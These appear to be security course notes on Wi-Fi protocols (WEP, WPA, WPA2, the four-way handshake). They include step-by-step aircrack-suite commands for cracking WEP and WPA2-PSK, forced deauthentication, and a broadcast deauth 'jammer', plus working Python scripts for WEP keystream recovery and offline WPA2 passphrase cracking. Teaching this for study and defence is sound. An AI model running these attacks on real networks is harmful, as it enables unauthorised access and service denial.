Mukezh

Session Wireless Network

Feb 25th, 2019
Session 19
============
What is a wireless network?
-> A wireless network is a network whose devices are not connected by cables or any such medium. The technology came into existence because it lets companies avoid the costly process of pulling cables through buildings and makes communication portable. Wired communication becomes messy to handle, which is what led to the solution of Wi-Fi. (Wi-Fi is a brand name owned by the Wi-Fi Alliance, not an acronym; "Wireless Fidelity" is a popular back-formation.)


The Wi-Fi Alliance takes care of such wireless issues and certifies Wi-Fi products that conform to certain standards of interoperability.

For using these wireless networks there is a standard that sets the rules and regulations for wireless LAN communication, named "IEEE 802.11".

Free Wifi
==========
Everybody jumps on free Wi-Fi at places like Domino's, Pizza Hut, airports, railway stations, etc.
Connecting to such Wi-Fi exposes you to
--> MITM (Man In The Middle attack)
--> DoS / DDoS (Denial of Service)
--> Impersonation (an attacker's access point posing as the legitimate one)
--> Data Theft and even Identity Theft

Because of this free Wi-Fi facility hackers have a convenient place to carry out malicious activity, and this is exactly why we need WIFI SECURITY.


# In order to run Wi-Fi securely several protocols were made, and they have been changed from time to time because of security issues. They are listed below...

WEP (Wired Equivalent Privacy)
WPA (Wi-Fi Protected Access)
WPA2 (Wi-Fi Protected Access 2)



Wired Equivalent Privacy (WEP) was the first protection standard, introduced in 1997 with the original IEEE 802.11. By 2001 several serious weaknesses had been identified (the Fluhrer-Mantin-Shamir attack on RC4's key scheduling among them), so that today a WEP key can be cracked within minutes. The main weakness of WEP is its use of a static encryption key: when you set up a router with a WEP key, that same key is used by every device on your network to encrypt every packet that is transmitted. The only per-frame variation is a 24-bit initialization vector (IV) sent in the clear, and on a busy network an IV is likely to repeat after a few thousand frames. WEP uses the RC4 stream cipher (the per-frame RC4 key is IV || shared key) and a CRC-32 checksum for integrity; it does not use DES.
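An added example (not from the session notes) of why the static key plus a 24-bit IV is fatal. The RC4 below is the real algorithm, but the WEP key, the IVs and the frame payloads are constructed and the CRC-32 ICV is left out. Two frames that reuse an IV share a keystream, so knowing one plaintext (a predictable ARP or DHCP frame, say) decrypts the other without ever touching the key; the birthday-bound helper shows how few frames a busy network needs before that happens, which is why the WEP cracking steps later in these notes collect tens of thousands of data packets.

```python
"""WEP's fatal flaw, demonstrated (added example, not from the session notes).

WEP encrypts every frame as  C = P XOR RC4(IV || shared_key)  and sends the 3-byte IV
in the clear. The shared key is static, so two frames that reuse an IV are encrypted
with the *same* keystream, and  C1 XOR C2 = P1 XOR P2. Knowing one plaintext then
decrypts the other frame directly. RC4 here is the real algorithm; key, IVs and
payloads are constructed; the CRC-32 ICV is omitted.
"""
import math


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key-scheduling algorithm, then n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, shared_key: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: clear IV, then plaintext XOR RC4(IV || key)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + xor(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def recover_with_known_plaintext(frame_known: bytes, known_plaintext: bytes, frame_target: bytes) -> bytes:
    """Attacker side, no key needed: same IV => same keystream, so C XOR P yields the
    keystream, which then strips the other frame (up to len(known_plaintext) bytes)."""
    if frame_known[:3] != frame_target[:3]:
        raise ValueError("different IVs: keystreams differ, this trick does not apply")
    keystream = xor(frame_known[3:], known_plaintext)
    return xor(frame_target[3:], keystream)


def frames_until_iv_repeat(probability: float, iv_bits: int = 24) -> int:
    """Birthday bound: frames with random IVs needed for the given probability of at
    least one IV reuse. For 24-bit IVs and p = 0.5 this is under 5000 frames."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def demo() -> bytes:
    """Constructed scenario: the AP reuses IV 4a6b1c for two frames and the attacker
    knows the plaintext of the first one."""
    shared_key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit WEP key
    iv = bytes.fromhex("4a6b1c")
    known = b"ARP request (known/guessable)"                  # constructed, 29 bytes
    secret = b"user password: hunter2, sigh!"                 # constructed, 29 bytes
    frame1 = wep_encrypt(iv, shared_key, known)
    frame2 = wep_encrypt(iv, shared_key, secret)
    return recover_with_known_plaintext(frame1, known, frame2)  # == secret, key never used


if __name__ == "__main__":
    print(demo())
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_repeat(0.5))
```

Real WEP cracking (aircrack-ng's PTW attack) goes further than this and recovers the shared key itself from the statistics of the RC4 keystreams, but it rests on the same two facts: the key never changes and the IV is public.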

Wi-Fi Protected Access (WPA) :
To overcome the consequences of the attacks on WEP, WPA was introduced in 2003 as a stop-gap based on a draft of IEEE 802.11i. WPA comes in two flavours, WPA-Personal and WPA-Enterprise. Both use the Temporal Key Integrity Protocol (TKIP), which still runs RC4 underneath but mixes a fresh key for every packet and adds a message integrity check (Michael), so the static-key problem of WEP goes away and it becomes much harder for an attacker to recover the key.
The difference between the two flavours is authentication. WPA-Personal authenticates with a pre-shared key (the Wi-Fi passphrase). In WPA-Enterprise authentication is done on the server side using IEEE 802.1X with a RADIUS (Remote Authentication Dial In User Service) server, and RADIUS carries an EAP (Extensible Authentication Protocol) method such as PEAP or EAP-TLS.

Wi-Fi Protected Access 2 (WPA2) :
WPA2 (2004) is the full IEEE 802.11i standard. It replaces TKIP with CCMP, an AES-based cipher mode, because TKIP was only a patch that kept RC4 for the sake of old hardware. Like WPA it has a Personal (PSK) mode for the normal person who cannot run a RADIUS server, and an Enterprise (802.1X/EAP) mode.
Building blocks you will meet with WPA/WPA2:
|
|--> AES (Advanced Encryption Standard)
|    ==================================
|    # A symmetric block cipher chosen by the U.S. government to protect classified information; implemented in software and hardware throughout the world to encrypt sensitive data.
|    # It uses 128-bit blocks with keys sized at 128, 192 and 256 bits. WPA2 uses AES-128 inside CCMP.
|
|--> DES (Data Encryption Standard)
|    ==============================
|    # DES is an implementation of a Feistel cipher with a 16-round Feistel structure.
|    # The block size is 64 bits. The key is written as 64 bits, but 8 of those are parity bits, so the effective key length is 56 bits, which is why DES is considered broken today.
|    # The plaintext goes through 16 rounds of the round function to produce the ciphertext.
|    # Listed here for comparison with AES only: DES is not used by WEP, WPA or WPA2.
|
|--> TKIP (Temporal Key Integrity Protocol)
|    =======================================
|    # TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as an interim solution to replace WEP without requiring the replacement of legacy hardware.
|
|--> PSK (Pre-Shared Key)
|    ====================
|    # Wi-Fi Protected Access Pre-Shared Key (WPA-PSK) is the mechanism used to authenticate and validate users on a wireless LAN (WLAN) when there is no authentication server: everyone shares one passphrase. WPA-PSK is also known as WPA Personal; the WPA2 version is WPA2-PSK (WPA2 Personal).
|
|--> CCMP
|    ====
|    # Counter mode with Cipher Block Chaining Message Authentication Code Protocol.
|    # The mechanism that performs the cryptography for confidentiality and integrity of data frames.
|    # TKIP is now obsolete and is replaced by CCMP.
|    # The CCMP algorithm is based on the U.S. federal government's Advanced Encryption Standard (AES).
|    # The Counter Mode component provides data privacy. The Cipher Block Chaining Message Authentication Code component provides data integrity and authentication.


Four Way Handshake
=======================

Before any encrypted data flows, the AP (authenticator) and the client (supplicant) run the four-way handshake. In order:

      Router (AP)                                            Client
      |                                                       |
      |  Beacons (broadcast, ~10 per second) ---------------> |  here you see the wireless network as "available"
      |                                                       |
      |  <---- Probe / Open Authentication / Association ---> |  clicking on a Wi-Fi network triggers these
      |                                                       |
      |  Msg 1: ANonce (AP's random number) ----------------> |
      |                                                       |  client: PTK = PRF(PMK, ANonce, SNonce, both MACs)
      |  <-------------------------------- Msg 2: SNonce + MIC |
      |  AP: derives the same PTK, checks the MIC             |
      |  Msg 3: GTK (encrypted) + MIC, install keys --------> |
      |  <----------------------------------- Msg 4: ACK + MIC |
      |                                                       |
      |  ============ encrypted data from here on ============ |

KEY + Passphrase: the passphrase is the password the user types in. The key is something derived from it that gets attached to every session, and it is complex, so to keep things user friendly the user only has to enter the passphrase. For WPA/WPA2-Personal the PMK (Pairwise Master Key) is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); the PTK (Pairwise Transient Key) is then derived from the PMK plus the two nonces and the two MAC addresses, and its first 16 bytes (the KCK) compute the MICs shown above. The passphrase itself never crosses the air; only the nonces and MICs do, which is exactly what an offline dictionary attack needs.




The main thing to notice is what happens when we are an already authenticated user: what is the scenario during a reconnection??
Is it again the four-way handshake, or something else...
Answer: every time a client (re)associates with the AP, the four-way handshake runs again with fresh nonces. That is why an attacker who missed the original handshake can force a new one by kicking the client off (deauthentication) and capturing what follows.



CAPTURING WIRELESS COMMUNICATION PACKETS
==========================================

Attacker's Machine - Kali OS
Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
Tool - Airmon-ng , Airodump-ng (Non-Graphical)


Modes of Using a Wireless Adapter :

# Managed (standard) mode : the mode everyone normally uses, where the adapter associates to one Access Point and only receives frames addressed to it.
# Monitor mode : the mode which allows a system with a wireless network interface controller to passively capture all 802.11 frames on a channel, without associating to any AP. Not every adapter or driver supports it, which is why an external adapter is used here.

Command: iwconfig --> to check which mode the Wi-Fi adapter is working in (look for "Mode:Managed" or "Mode:Monitor")


Tools we will be encountering are :

* Airmon-ng : a tool which switches our wireless card into monitor mode. Yes, that means our wireless card will listen to everyone!
Well, that's almost correct. Monitor mode is the wireless equivalent of promiscuous mode: the card can see and receive all network traffic on its channel. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but after airmon-ng it will receive all wireless frames, whether intended for us or not.

Commands:
# iwconfig
# airmon-ng start wlan0      (creates the monitor interface, usually wlan0mon)
# kill <PID>                 (the processes airmon-ng lists as likely to interfere, e.g. NetworkManager, wpa_supplicant; "airmon-ng check kill" does the same in one step)


* Airodump-ng : a tool which enables us to capture packets matching our specification. It will also show us more information about a particular wireless network, so let's go through the keywords in its output.

Commands:
# airodump-ng wlan0mon
# airodump-ng --bssid <AP BSSID> -c <channel> -w <capture file prefix> wlan0mon


Terminologies
==============
Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far away.

#Data : Number of captured data packets, including data broadcast packets. For WEP this is the count that matters, since every data packet carries a fresh IV.

#/s : Number of data packets per second, measured over the last 10 seconds.

CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.

MB : Maximum speed supported by the AP.

ENC : Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.

CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).

WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates the version supported.

ESSID : The name of the network (SSID) that the Access Point broadcasts.

BSSID : The MAC / physical address of the Access Point. (The original notes had these two the wrong way round.)

WEP
===
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
   note the target's BSSID and channel number
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
Wait until the #Data column (captured data packets, i.e. IVs) reaches a few tens of thousands. The beacon count does not help: beacons are unencrypted and carry no IVs. On an idle network this can take a long time, which is why attackers replay captured ARP frames to make the AP generate more IVs.
#aircrack-ng aranjit-01.cap

WPA|WPA2
========
Cracking WPA/WPA2-PSK is not about collecting IVs: we need one complete four-way handshake (the EAPOL frames) and then test passphrases offline against it, so the wordlist decides success.

When there is a new device connecting
-------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
   note the target's BSSID and channel number
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
When a client connects, airodump-ng prints "WPA handshake: <BSSID>" in the top right corner: the handshake is in the capture file.
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap


When there is no new device connecting
-------------------------------------
#iwconfig
#airmon-ng
#airmon-ng start wlan0
#iwconfig
#airodump-ng wlan0mon
   note the target's BSSID, channel number and the MAC of a connected station
#airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
Keep this running in one terminal; it will capture the WPA handshake. In a second terminal, force the station to reconnect with 10 deauthentication frames:
#aireplay-ng -0 10 -a <Router's BSSID> -c <Station's MAC> wlan0mon
The station drops off and re-associates, which makes it perform a fresh handshake that we capture. (-c is the client to kick; the original notes used -s, which in aireplay-ng is a source-MAC filter, not the station.) If the network uses 802.11w / Protected Management Frames, clients ignore these spoofed deauth frames.
#aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
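The four-way handshake section above and the WPA/WPA2 cracking steps just listed are two sides of the same arithmetic, so here is one added example (not from the session notes, and not aircrack-ng's own code) that does offline what aircrack-ng does with the .cap file: derive PMK and PTK from a candidate passphrase and recompute the message-2 MIC. The SSID, MAC addresses, nonces, EAPOL frame and true passphrase are all constructed in code so the script runs without a capture; the key-derivation formulas and the EAPOL-Key frame layout are the real WPA2 (CCMP, key descriptor version 2) ones.

```python
"""Offline WPA2-PSK dictionary attack against a captured four-way handshake
(added example, not from the session notes).

Everything needed is in the capture: SSID (from the beacon), AP and client MACs,
ANonce (message 1), SNonce and MIC (message 2). The passphrase never travels over
the air, so each candidate is tested by re-deriving the keys and recomputing the MIC:
    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    PTK = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))
    KCK = PTK[0:16];  MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC field zeroed)[:16]
The handshake below is constructed with a known passphrase so the script runs offline.
"""
import hashlib
import hmac

# Offset of the 16-byte MIC in an EAPOL-Key frame: EAPOL header 4 + descriptor type 1
# + key info 2 + key length 2 + replay counter 8 + nonce 32 + IV 16 + RSC 8 + ID 8
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: the 256-bit PMK is a PBKDF2 stretch of the passphrase, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, 2, 3."""
    return b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK binds the PMK to this session: both MACs and both nonces, in canonical order."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with its own MIC field set to zero."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if key_descriptor_version == 1:                              # WPA / TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]     # WPA2 / CCMP


def crack(hs: dict, wordlist) -> "str | None":
    """Return the first candidate whose recomputed MIC matches the captured one, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol_msg2"], hs["version"]), hs["mic"]):
            return candidate
    return None


def constructed_handshake(true_passphrase: str) -> dict:
    """Build what airodump-ng would have captured from an AP whose passphrase we choose here."""
    ssid = "CoffeeShop-Free"                                      # constructed
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # constructed
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))      # constructed nonces
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"                # key length 16
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16               # MIC placeholder
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    msg2 = b"\x01\x03" + len(body).to_bytes(2, "big") + body       # EAPOL v1, type 3 (Key)
    ptk = derive_ptk(pmk_from_passphrase(true_passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], msg2, 2)
    msg2 = msg2[:MIC_OFFSET] + mic + msg2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_msg2": msg2, "mic": mic, "version": 2}


if __name__ == "__main__":
    hs = constructed_handshake("pizza4life")                       # the attacker does not see this
    print(crack(hs, ["password", "12345678", "pizza4life", "letmein1"]))
```

Every candidate costs 4096 HMAC-SHA1 rounds, which is why this is GPU work in practice (hashcat mode 22000 consumes the same fields) and why a long random passphrase, not a hidden SSID or MAC filtering, is the defence. Note that the SSID is the PBKDF2 salt: changing only the passphrase on the same SSID keeps precomputed tables valid, changing the SSID invalidates them.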

WiFi Jammer
===========
#aireplay-ng -0 0 -a <Router's BSSID> wlan0mon
-0 0 means send deauthentication frames forever. Leaving out -c sends them to the broadcast address, so every station on that AP is kicked off repeatedly. (The original note's "-s FF:FF:FF:FF:FF:FF" does not do this: -s is a source-MAC filter in aireplay-ng.) Stations with Protected Management Frames (802.11w) enabled are not affected.